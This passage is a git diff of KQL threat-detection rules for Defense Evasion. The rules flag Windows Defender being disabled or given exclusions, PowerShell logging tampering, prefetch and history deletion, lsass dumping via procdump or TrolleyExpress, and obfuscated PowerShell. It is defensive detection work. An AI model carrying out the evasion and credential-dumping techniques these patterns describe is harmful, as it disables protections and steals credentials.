ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql index 77b323a6..7af11faa 100644 --- a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql +++ b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Console History Logs Deleted -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: medium -// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 - -DeviceFileEvents +// Title: PowerShell Console History Logs Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceFileEvents | where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql index 7fdd5b39..75f7bca4 100644 --- a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql +++ b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Core DLL Loaded Via Office Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-01 -// Level: medium -// Description: Detects PowerShell core DLL being loaded by an Office Product -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceImageLoadEvents +// Title: PowerShell Core DLL Loaded Via Office Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects PowerShell core DLL being loaded by an Office Product +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceImageLoadEvents | where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql index ed0c9d81..6254118c 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql @@ -1,13 +1,13 @@ -// Title: Powershell Defender Disable Scan Feature -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-03 -// Level: high -// Description: Detects requests to disable Microsoft Defender features using PowerShell commands -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Possible administrative activity -// - Other Cmdlets that may use the same parameters - -DeviceProcessEvents +// Title: Powershell Defender Disable Scan Feature +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-03 +// Level: high +// Description: Detects requests to disable Microsoft Defender features using PowerShell commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible administrative activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents | where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql index 19f19cf2..4dd05231 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql @@ -1,13 +1,13 @@ -// Title: Powershell Defender Exclusion -// Author: Florian Roth (Nextron Systems) -// Date: 2021-04-29 -// Level: medium -// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Possible Admin Activity -// - Other Cmdlets that may use the same parameters - -DeviceProcessEvents +// Title: Powershell Defender Exclusion +// Author: Florian Roth (Nextron Systems) +// Date: 2021-04-29 +// Level: medium +// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible Admin Activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql index 4d40e3d9..191d79af 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql @@ -1,14 +1,14 @@ -// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' -// Author: Matt Anderson (Huntress) -// Date: 2025-07-11 -// Level: high -// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). -// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. -// An attacker might use this technique via the command line to bypass defenses before executing payloads. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Highly unlikely - -DeviceProcessEvents +// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction' +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: high +// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9'). +// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level. +// An attacker might use this technique via the command line to bypass defenses before executing payloads. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql index 1f195db4..aae7fe6a 100644 --- a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql +++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql @@ -1,11 +1,11 @@ -// Title: Powershell Executed From Headless ConHost Process -// Author: Matt Anderson (Huntress) -// Date: 2024-07-23 -// Level: medium -// Description: Detects the use of powershell commands from headless ConHost window. -// The "--headless" flag hides the windows from the user upon execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003 - -DeviceProcessEvents +// Title: Powershell Executed From Headless ConHost Process +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: medium +// Description: Detects the use of powershell commands from headless ConHost window. +// The "--headless" flag hides the windows from the user upon execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql index f3709ea0..950e05a4 100644 --- a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql +++ b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Logging Disabled Via Registry Key Tampering -// Author: frack113 -// Date: 2022-04-02 -// Level: high -// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceRegistryEvents +// Title: PowerShell Logging Disabled Via Registry Key Tampering +// Author: frack113 +// Date: 2022-04-02 +// Level: high +// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql index 1f796e48..d2600bfa 100644 --- a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql +++ b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Script Change Permission Via Set-Acl -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-18 -// Level: high -// Description: Detects PowerShell execution to set the ACL of a file or a folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: PowerShell Script Change Permission Via Set-Acl +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects PowerShell execution to set the ACL of a file or a folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql index 653acae6..350ecce2 100644 --- a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql +++ b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Set-Acl On Windows Folder -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-18 -// Level: high -// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: PowerShell Set-Acl On Windows Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-18 +// Level: high +// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql index 8c648c23..7904ae91 100644 --- a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql +++ b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql @@ -1,10 +1,10 @@ -// Title: Powershell Token Obfuscation - Process Creation -// Author: frack113 -// Date: 2022-12-27 -// Level: high -// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.009 - -DeviceProcessEvents +// Title: Powershell Token Obfuscation - Process Creation +// Author: frack113 +// Date: 2022-12-27 +// Level: high +// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.009 + +DeviceProcessEvents | where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql index 0708ecd6..4cf0c433 100644 --- a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql +++ b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql @@ -1,10 +1,10 @@ -// Title: Prefetch File Deleted -// Author: Cedric MAURUGEON -// Date: 2021-09-29 -// Level: high -// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceFileEvents +// Title: Prefetch File Deleted +// Author: Cedric MAURUGEON +// Date: 2021-09-29 +// Level: high +// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceFileEvents | where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/Defense Evasion/procdump_execution.kql index 79edbce1..8ebc8682 100644 --- a/KQL/rules/Defense Evasion/procdump_execution.kql +++ b/KQL/rules/Defense Evasion/procdump_execution.kql @@ -1,12 +1,12 @@ -// Title: Procdump Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-16 -// Level: medium -// Description: Detects usage of the SysInternals Procdump utility -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - Legitimate use of procdump by a developer or administrator - -DeviceProcessEvents +// Title: Procdump Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-16 +// Level: medium +// Description: Detects usage of the SysInternals Procdump utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Legitimate use of procdump by a developer or administrator + +DeviceProcessEvents | where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql index efb0fafa..bfd8847d 100644 --- a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql +++ b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql @@ -1,10 +1,10 @@ -// Title: Process Access via TrolleyExpress Exclusion -// Author: Florian Roth (Nextron Systems) -// Date: 2022-02-10 -// Level: high -// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001 - -DeviceProcessEvents +// Title: Process Access via TrolleyExpress Exclusion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-10 +// Level: high +// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql index 43b5b502..2991b840 100644 --- a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql +++ b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql @@ -1,10 +1,10 @@ -// Title: Process Creation Using Sysnative Folder -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-08-23 -// Level: medium -// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 - -DeviceProcessEvents +// Title: Process Creation Using Sysnative Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-08-23 +// Level: medium +// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 + +DeviceProcessEvents | where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql index a7e38ca7..1832f3e8 100644 --- a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql +++ b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql @@ -1,10 +1,10 @@ -// Title: Process Execution From A Potentially Suspicious Folder -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2019-01-16 -// Level: high -// Description: Detects a potentially suspicious execution from an uncommon folder. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Process Execution From A Potentially Suspicious Folder +// Author: Florian Roth 